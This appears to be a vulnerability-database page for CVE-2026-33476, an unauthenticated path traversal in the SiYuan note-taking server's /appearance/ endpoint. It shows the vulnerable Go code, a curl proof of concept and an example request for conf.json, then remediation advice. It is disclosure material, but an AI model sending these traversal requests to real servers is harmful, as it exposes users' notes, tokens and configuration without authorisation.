Docker
CVE-2026-33476
HIGH
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The Siyuan kernel exposes an unauthenticated file-serving endpoint under /appearance/*filepath. Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process.
Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials.
Details
Vulnerable Code Location
File: kernel/server/serve.go
siyuan.GET("/appearance/*filepath", func(c *gin.Context) {
filePath := filepath.Join(
appearancePath,
strings.TrimPrefix(c.Request.URL.Path, "/appearance/")
)
...
c.File(filePath)
})Technical Root Cause
The handler constructs a filesystem path by joining a base directory (appearancePath) with user-controlled URL segments.
Key issues:
1. Unsanitized User Input
The path component extracted from the request is not validated or normalized to prevent traversal.
strings.TrimPrefix(c.Request.URL.Path, "/appearance/")This preserves sequences such as:
../
..\ (Windows)2. Unsafe Path Joining
_filepath.Join()_ does not enforce directory confinement.
This escapes the intended directory.
3. Direct File Serving
The resolved path is served without verification:
c.File(filePath)Authentication Bypass (Unauthenticated Access)
Authentication middleware explicitly skips /appearance/ requests.
File: session.go
if strings.HasPrefix(c.Request.RequestURI, "/appearance/") ||
strings.HasPrefix(c.Request.RequestURI, "/stage/build/export/") ||
strings.HasPrefix(c.Request.RequestURI, "/stage/protyle/") {
c.Next()
return
}This allows attackers to access the vulnerable endpoint without a session or token.
Exploitation Scenario
A remote attacker can craft a URL containing directory traversal sequences to read files accessible to the Siyuan process.
Example request:
GET /appearance/../../data/conf.json HTTP/1.1
Host: target
Because authentication is bypassed, the attack requires no credentials.
PoC
Step 1 - Create marker file
mkdir -p ./workspace/data
echo POC_EXPLOITED > ./workspace/data/poc_exploit.txtStep 2 - Run SiYuan container
docker run -d \
-p 6806:6806 \
-e SIYUAN_ACCESS_AUTH_CODE_BYPASS=true \
-v $(pwd)/workspace:/siyuan/workspace \
b3log/siyuan \
--workspace=/siyuan/workspace
Step 3 - Confirm service works
Open in browser:
http://127.0.0.1:6806Exploit PoC
Method A - using CURL command
Use --path-as-is so curl does NOT normalize ../.
curl -v --path-as-is \
"http://127.0.0.1:6806/appearance/../../data/poc_exploit.txt"Output
HTTP/1.1 200 OK
POC_EXPLOITEDMethod B - Using Browser
http://127.0.0.1:6806/appearance/../../data/poc_exploit.txtIf method B is not working, use method A, which is CURL command to do the exploit
Impact
An unauthenticated attacker can read arbitrary files accessible to the server process, including:
- Workspace configuration files
- User notes and stored data
- API tokens and secrets
- Local system files (depending on permissions)
This may lead to:
- Sensitive information disclosure
- Credential leakage
- Further compromise through exposed secrets
AnalysisAI
An unauthenticated directory traversal vulnerability exists in Siyuan kernel's /appearance/ endpoint, allowing remote attackers to read arbitrary files accessible to the server process without authentication. The vulnerability affects the Go-based Siyuan note-taking application (github.com/siyuan-note/siyuan/kernel) and has been assigned a CVSS score of 7.5 (High). A working proof-of-concept exploit is publicly available demonstrating successful file retrieval via crafted URLs containing path traversal sequences, and a patch has been released by the vendor.
Technical ContextAI
Siyuan is a Go-based personal knowledge management and note-taking application distributed as a Docker container and standalone binary. The vulnerability resides in kernel/server/serve.go where the Gin web framework handler for /appearance/*filepath endpoint constructs filesystem paths using filepath.Join() with unsanitized user input from URL path segments. The root cause maps to CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) where the code uses strings.TrimPrefix() to extract the path component without normalizing or validating traversal sequences like ../ before passing it to c.File() for direct file serving. The authentication bypass occurs because session.go explicitly exempts /appearance/ routes from authentication middleware checks, treating them as public static resources when they should be protected. The affected package identifier is pkg:go/github.com_siyuan-note_siyuan_kernel, indicating this is a vulnerability in the core kernel module of the application.
RemediationAI
Upgrade Siyuan to the patched version incorporating commit 009bb598b3beccc972aa5f1ed88b3b224326bf2a or later as documented in the vendor security advisory at https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7. For Docker deployments, pull the latest b3log/siyuan image that includes the fix and recreate containers. Until patching is complete, implement network-level access controls to restrict the /appearance/ endpoint to trusted IP ranges only, deploy Siyuan behind a reverse proxy with path normalization that blocks traversal sequences, or disable network access entirely and operate in localhost-only mode. Review server logs for suspicious requests containing ../ patterns in /appearance/ paths to identify potential exploitation attempts. After patching, rotate any API tokens, access codes, or credentials that may have been exposed through workspace configuration files, and audit workspace data for unauthorized access.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-22 – Path Traversal
View allSame technique Information Disclosure
View allVendor StatusVendor
SUSE
Severity: High| Product | Status |
|---|---|
| openSUSE Leap 15.6 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP6 | Fixed |
| openSUSE Leap 15.5 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-hhgj-gg9h-rjp7